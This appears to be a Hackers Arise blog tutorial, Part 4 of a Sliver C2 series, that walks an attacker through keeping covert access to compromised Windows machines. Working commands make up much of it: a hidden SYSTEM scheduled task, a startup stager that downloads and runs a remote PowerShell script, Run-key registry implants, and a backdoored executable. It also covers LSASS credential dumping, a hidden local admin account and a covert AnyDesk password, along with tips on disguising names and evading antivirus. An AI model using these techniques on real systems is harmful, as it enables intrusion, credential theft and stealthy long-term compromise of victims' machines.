“Often, the battle goes not to the strongest, but rather to the most persistent.” — OTW In earlier articles, we walked through everything from getting the first C2 online to gaining a foothold on a machine and escalating privileges. Most of the hard work is done. Once you’ve got high-level access, you’re in a strong […]
The post Sliver, Command and Control (C2): Building a Persistent C2, Part 4 first appeared on Hackers Arise.
“Often, the battle goes not to the strongest, but rather to the most persistent.”
— OTW
In earlier articles, we walked through everything from getting the first C2 online to gaining a foothold on a machine and escalating privileges. Most of the hard work is done. Once you’ve got high-level access, you’re in a strong position, but that doesn’t mean you can relax. What matters now is keeping that access. Connections can drop, processes can be killed, or machines might reboot. Without persistence, all your progress can disappear. In this article, we make sure you can always get back in.
In this article we’re focusing on Windows, but the concept applies everywhere. Persistence is a broad topic. For example, on Linux, crontabs are often used for persistence, and hackers sometimes encode commands in base64 for extra cover. Learning multiple methods is important. The more tools you know, the better you can adapt to different targets.
Payload Generation
When it comes to persistence, an executable is often the easiest option. Essentially, it’s just another implant, like the one you built earlier.
sliver > generate –http
You can give the file any name, but it shouldn’t stand out. The goal is to make it look like it belongs. Avoid dumping it into places like C:\Temp, which gets cleaned out regularly. Many attackers prefer to use C:\Windows\System32, since admins usually stay away from it out of caution. Some names that blend in well are dllhost.exe, conhost.exe, winlogon.exe, wmiprvse.exe, and msiexec.exe. Just don’t overwrite the real system binaries. For the sake of simplicity, we’ll use a basic name.
Delivery
Once the payload is ready, it has to be delivered to the target. In earlier steps, you learned how to upload files using Sliver:
sliver (session) > upload /tmp/persist.exe C:\\Windows\\System32\\persist.exe
You could reuse the payload from your initial access, but it may already be logged and flagged. It’s safer to create a new one. Also, update the file’s timestamp after uploading it to make it less suspicious.
Scheduled Tasks
Windows Task Scheduler is a common way to maintain access. Sometimes, you’ll find old tasks that can be modified for your needs. That’s ideal since the task already exists and won’t raise suspicion. If there’s nothing useful, you can create your own:sliver (session) > execute schtasks /create /tn “Windows Services and Tasks” /tr “C:\Windows\System32\persist.exe” /sc hourly /mo 6 /ru System
This sets up a task that runs your executable every six hours with SYSTEM privileges. The name “Windows Services and Tasks” helps it blend in. Don’t try to be clever or unique with naming, keep it boring and native.
There’s also a PowerShell way to do this, but spawning PowerShell processes can get you noticed. Some environments log or monitor PowerShell closely. Still, knowing both methods gives you options.
Startup Folder
Sometimes, Russian admins don’t keep antivirus running full-time across all systems. That’s partly because some of those machines rely on cracked or pirated software, which would constantly trigger AV alerts. Instead, they tend to run manual scans from time to time, especially when something looks off. These checks aren’t regular, but when they do happen, anything that stands out, like a dropped payload can easily get flagged and removed.
In that case, using a lightweight stager can help. Here’s how to create one that runs at startup:
sliver (session) > sharpersist — -t startupfolder -c “powershell.exe” -a “-nop -w hidden -Command \”IEX (irm ‘http://
This sets up a PowerShell command to run on system startup. It pulls a script from your server over HTTP and runs it. That script could then download and run your actual payload. This way, the system never keeps the full implant on disk for long, and antivirus tools are less likely to pick it up. You can name the entry something that fits the environment, like “EdgeUpdater” for example. Adjust it to your needs, but be careful with quoting and backslashes.
Registry Persistence
Another option is the Windows Registry. It’s a favorite among attackers because it’s harder for some admins to track. Still, some setups monitor registry changes, so be careful. Over time, you’ll get a feel for which methods are safer depending on the target.
Low Privilege (HKCU)
If you don’t have elevated privileges, this is your fallback:
sliver (session) > registry write -T string -H HKCU “Software\\Microsoft\\Windows\\CurrentVersion\\Run\\” “C:\\Users\\Public\\persist.exe”
This entry will execute your payload every time the compromised user logs in. If you want it to run only once, use RunOnce instead of Run.
High Privilege (HKLM)
With higher privileges, you can target all users on the system:
sliver (session) > registry write -T string -H HKLM “Software\\Microsoft\\Windows\\CurrentVersion\\Run\\” “C:\\Windows\\System32\\persist.exe”
Same idea, just applied at a broader level. The result is a more reliable form of persistence that doesn’t depend on one user.
Backdooring a Program
Another technique is to backdoor an existing executable. This means injecting a payload into a program so that every time it’s opened, it connects back to your C2. Keep in mind the program will no longer function as intended, it’s just a launcher now.
Here’s how to do that in Sliver:
sliver > profiles new –format shellcode –http
sliver > http -L
sliver (session) > backdoor –profile backdoor “C:\path\to\file.exe”
In this case, you’re creating a profile called backdoor, starting a listener, and then injecting that payload into something like putty.exe. It’s not the best persistence method, but still worth knowing. We will leave the rest for you to experiment with.
Dumping LSASS
In the last chapter, you dumped password hashes from the SAM. Now we’re going after LSASS, which stores NTLM hashes for users currently logged in. This method can give you credentials for admins or service accounts, which can be used for lateral movement or better persistence.
Get the LSASS PID
First, we need to find out the process ID assigned to lsass.exe
sliver (session) > ps -e lsass
Dump the Process
Having the process ID, we will dump the LSASS using procdump and save it on our C2. ProcDumpis a lightweight, command‑line utility designed for creating process memory dumps under specified conditions.
sliver (session) > procdump –pid 688 –save /tmp/lsass.dmp
Extract Credentials
Pypykatz is another open‑source Python implementation of Mimikatz. It lets you extract credentials and secrets from Windows systems either “live” by reading the local LSASS process, or offline by parsing memory dumps and registry hives.
c2 > pypykatz lsa minidump /tmp/lsass.dmp
This gives you a list of users, their sessions, and credentials. If you’re lucky, you’ll find a domain admin account that can be used elsewhere.
Creating a Local Admin
If you can’t crack the hashes or you just need a fallback, you can add a new local admin account. This is simple, but it’s more likely to be flagged if someone’s watching. In some cases, it’s better to add an existing user to the Administrators group instead of creating one from scratch.
sliver (session) > execute net user service P@ssw0rd! /add
sliver (session) > execute net localgroup Administrators service /add
This will create a new user “service” and add it to the Administrators group. With local admin rights, you can easily escalate to SYSTEM. If your machine is a part of the domain, you can edit DACL to perform attacks subtly. This is called DACL abuse and it’s hard to detect, unless proper defenses are in place. But those defenses are rare in practice.
AnyDesk
AnyDesk isn’t part of Sliver, but it’s still useful. It’s a legitimate remote desktop tool that can be quietly installed on systems that don’t get much attention. Set it up with a custom password and ensure it always grants access. Anydesk is a solid fallback option, but it requires valid cleartext credentials to be useful. It’s best to have a local administrator account to log in through it. As mentioned earlier, having an over-privileged machine account in the domain takes care of the rest. It opens the door for techniques like DCSync, abusing AdminSDHolder, and a range of other domain-level attacks. It will always give you a way in, even if other access methods get wiped.
If AnyDesk has already been installed, you can find out the ID to connect to the machine:
sliver (session) > execute -o powershell -Command “& ‘C:\Program Files (x86)\AnyDesk\AnyDesk.exe’ –get-id”
Then force a new password:
sliver (session) > execute -o powershell -Command “echo P@ssw0rd! | & ‘C:\Program Files (x86)\AnyDesk\AnyDesk.exe’ –set-password”
Conclusion
At this point, you’ve laid the groundwork for stable, long-term access. Persistence is not just a backup plan, it is a fundamental part of post-exploitation procedures. From here, you’re ready to map out the network and begin lateral movement.
In Part 5 we will learn how to perform Active Directory domain reconnaissance, which can uncover certificates, trust relationships, passwords, and all the other key artifacts.
The post Sliver, Command and Control (C2): Building a Persistent C2, Part 4 first appeared on Hackers Arise.
Source: HackersArise
Source Link: https://hackers-arise.com/sliver-command-and-control-c2-building-a-persistent-c2-part-4/